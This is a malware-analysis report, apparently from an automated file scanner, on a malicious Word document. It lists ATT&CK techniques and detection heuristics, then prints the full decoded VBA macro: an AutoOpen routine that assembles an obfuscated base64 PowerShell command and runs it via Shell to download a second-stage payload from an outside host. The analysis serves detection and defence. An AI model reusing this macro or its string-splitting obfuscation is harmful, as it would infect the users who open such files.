MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The AutoOpen macro is designed to execute obfuscated PowerShell commands. Specifically, it reconstructs the command 'Invoke-webrequest https://uspra5140.com/a' which is likely used to download and execute a second-stage payload. The use of obfuscated PowerShell and the AutoOpen macro are common techniques for initial compromise via malicious documents.
Heuristics 7
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
FQ_MJ = FS_KF & " -e " & BK_ND Shell$ FQ_MJ End Sub -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
FQ_MJ = FS_KF & " -e " & BK_ND Shell$ FQ_MJ End Sub -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "StockUpdate" Sub AutoOpen() Dim CL_MD As String -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5177 bytes |
SHA-256: b841dff21c3a6df34059fa81d11530bbdd30fe30daaf9bef61d6a8b842dde4e2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "StockUpdate"
Sub AutoOpen()
Dim CL_MD As String
CL_MD = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoAC"
Dim AK_KG As String
AK_KG = "QAeAApAHsAcgBlAHQAdQBy"
Dim IO_SE As String
IO_SE = "AG4AIABbAFMAeQBzA"
Dim IT_RF As String
IT_RF = "HQAZQBtAC4AVABlAHgAdAAuAEUA"
Dim FT_KB As String
FT_KB = "bgBjAG8AZABpAG4AZwBdADoAOgBVAFQA"
BK_ND = BK_ND & CL_MD & AK_KG & IO_SE & IT_RF & FT_KB
Dim JK_KC As String
JK_KC = "RgA4AC4ARw"
Dim IQ_TG As String
IQ_TG = "BlAHQAUwB0AHIAaQBuAGcAKAB"
Dim IK_KG As String
IK_KG = "bAFMAeQ"
Dim HL_RJ As String
HL_RJ = "BzAHQAZQBtAC4AQwBvAG4AdgBlA"
Dim AK_NF As String
AK_NF = "HIAdABdADoAOgBGAHIAbwBtAEIAYQBzA"
BK_ND = BK_ND & JK_KC & IQ_TG & IK_KG & HL_RJ & AK_NF
Dim CT_RD As String
CT_RD = "GUANgA0AF"
Dim BQ_PD As String
BQ_PD = "MAdAByAGkA"
Dim IK_RF As String
IK_RF = "bgBnACgA"
Dim ER_RB As String
ER_RB = "JAB4ACkAKQB9ADsAaQBlAHg"
Dim BL_KD As String
BL_KD = "AIAAkACgAY"
BK_ND = BK_ND & CT_RD & BQ_PD & IK_RF & ER_RB & BL_KD
Dim AL_RJ As String
AL_RJ = "QAgACQAKAAkACgAJAAoAGkAbgB2"
Dim AK_TH As String
AK_TH = "AG8AawBlAC0AdwBlAGIA"
Dim GT_RJ As String
GT_RJ = "cgBlAHEAdQBlAHMAdAAgACcAaAB0AHQ"
Dim EK_QF As String
EK_QF = "AcABzADoALwAvAHUA"
Dim AQ_QE As String
AQ_QE = "cwBwAHIAZAA1ADEANQAwAG"
BK_ND = BK_ND & AL_RJ & AK_TH & GT_RJ & EK_QF & AQ_QE
Dim FN_RD As String
FN_RD = "MAZQBuAH"
Dim CQ_MI As String
CQ_MI = "QAcgBhAG"
Dim HL_KG As String
HL_KG = "wALgB0AGEAYgBsAGUALgBjAG8AcgB"
Dim HO_SA As String
HO_SA = "lAC4AdwBpAG4AZABvAHcAcwAuAG4A"
Dim IL_RA As String
IL_RA = "ZQB0AC8AdwBhAHIAZQBoAG8"
BK_ND = BK_ND & FN_RD & CQ_MI & HL_KG & HO_SA & IL_RA
Dim EM_LG As String
EM_LG = "AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD"
Dim BN_RB As String
BN_RB = "0AUABhAHIAdA"
Dim BS_LF As String
BS_LF = "BpAHQAaQBvAG"
Dim AL_PB As String
AL_PB = "4ASwBlAHkAJQAyADAAZQBxACUAMgAwAC"
Dim IK_PH As String
IK_PH = "UAMgA3AHMAdAB"
BK_ND = BK_ND & EM_LG & BN_RB & BS_LF & AL_PB & IK_PH
Dim GP_OJ As String
GP_OJ = "hAGcAZQAlADIANw"
Dim IS_LJ As String
IS_LJ = "AmACQAUwBlAGwAZQBjAHQAPQBkAGEAdA"
Dim JK_SF As String
JK_SF = "BhACYAcwB2AD0AMgAwADEANwAtADAANAAtA"
Dim BN_QA As String
BN_QA = "DEANwAmAHMAcwA9AGI"
Dim BL_LC As String
BL_LC = "AZgBxAHQAJgBz"
BK_ND = BK_ND & GP_OJ & IS_LJ & JK_SF & BN_QA & BL_LC
Dim CQ_SC As String
CQ_SC = "AHIAdAA"
Dim EM_QJ As String
EM_QJ = "9AHMAYwBvACYAcwBwAD0Ac"
Dim EQ_SJ As String
EQ_SJ = "gB3AGQAbABhAGMAdQBwACYAcwBlAD0"
Dim IP_OI As String
IP_OI = "AMgAwADEANwAtADEAMA"
Dim HN_PF As String
HN_PF = "AtADAANgB"
BK_ND = BK_ND & CQ_SC & EM_QJ & EQ_SJ & IP_OI & HN_PF
Dim CP_OI As String
CP_OI = "UADIAMgA6ADQAMQA6"
Dim HM_NB As String
HM_NB = "ADEAMgBaAC"
Dim BK_PG As String
BK_PG = "YAcwB0AD0AMgAwADEANwAtADAAOQAtADI"
Dim AP_MA As String
AP_MA = "AOABUADE"
Dim GO_NE As String
GO_NE = "ANAA6ADQAM"
BK_ND = BK_ND & CP_OI & HM_NB & BK_PG & AP_MA & GO_NE
Dim EK_NE As String
EK_NE = "QA6ADEA"
Dim AM_ME As String
AM_ME = "MgBaACYAcwBwAHIAPQ"
Dim GK_PI As String
GK_PI = "BoAHQAdABwAHMAJgBzAGkAZwA9AHQAe"
Dim DQ_PG As String
DQ_PG = "gBQADcAY"
Dim IL_NJ As String
IL_NJ = "wA4AHgAWgBoAHIAMQBzAGIAdgB4AD"
BK_ND = BK_ND & EK_NE & AM_ME & GK_PI & DQ_PG & IL_NJ
Dim BO_KB As String
BO_KB = "kAZgBKAFMAdwBK"
Dim JQ_MH As String
JQ_MH = "AEkAUwBIAEIANgB"
Dim ET_KF As String
ET_KF = "lADgAJQAyAEIAbgBs"
Dim HS_RC As String
HS_RC = "AGwAdQBuAEgAaQBmAEwAMwBoAHgA"
Dim HS_QE As String
HS_QE = "agA0ACUAMwBEACcAIAAtAEgAZQBhAG"
BK_ND = BK_ND & BO_KB & JQ_MH & ET_KF & HS_RC & HS_QE
Dim FK_TE As String
FK_TE = "QAZQByAHMAIABAAHsAJwBBAGMAYwBlAH"
Dim JT_KI As String
JT_KI = "AAdAAnAD0AJwBBAHAAcABsAGkAYwBh"
Dim AQ_OB As String
AQ_OB = "AHQAaQBvA"
Dim DO_OD As String
DO_OD = "G4ALwBKAFMATwBOACcAfQApAC4AQwBvAG4A"
Dim EN_NB As String
EN_NB = "dABlAG4AdAAgAHwAIABD"
BK_ND = BK_ND & FK_TE & JT_KI & AQ_OB & DO_OD & EN_NB
Dim HT_KI As String
HT_KI = "AG8AbgB2AGUAcgB0AEYAcgBvAG"
Dim IN_KF As String
IN_KF = "0ALQBKAHMAbwBuACkALgB2AGEAbAB1AGU"
BK_ND = BK_ND & HT_KI & IN_KF
Dim EP_SE As String
EP_SE = "ALgBkAGEAdABh"
BK_ND = BK_ND & EP_SE
Dim IM_LJ As String
IM_LJ = "ACkAKQA="
BK_ND = BK_ND & IM_LJ
FS_KF = "p" + "O" + "w" + "E" + "r" + "S" + "h" + "E" + "l" + "L"
FQ_MJ = FS_KF & " -e " & BK_ND
Shell$ FQ_MJ
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.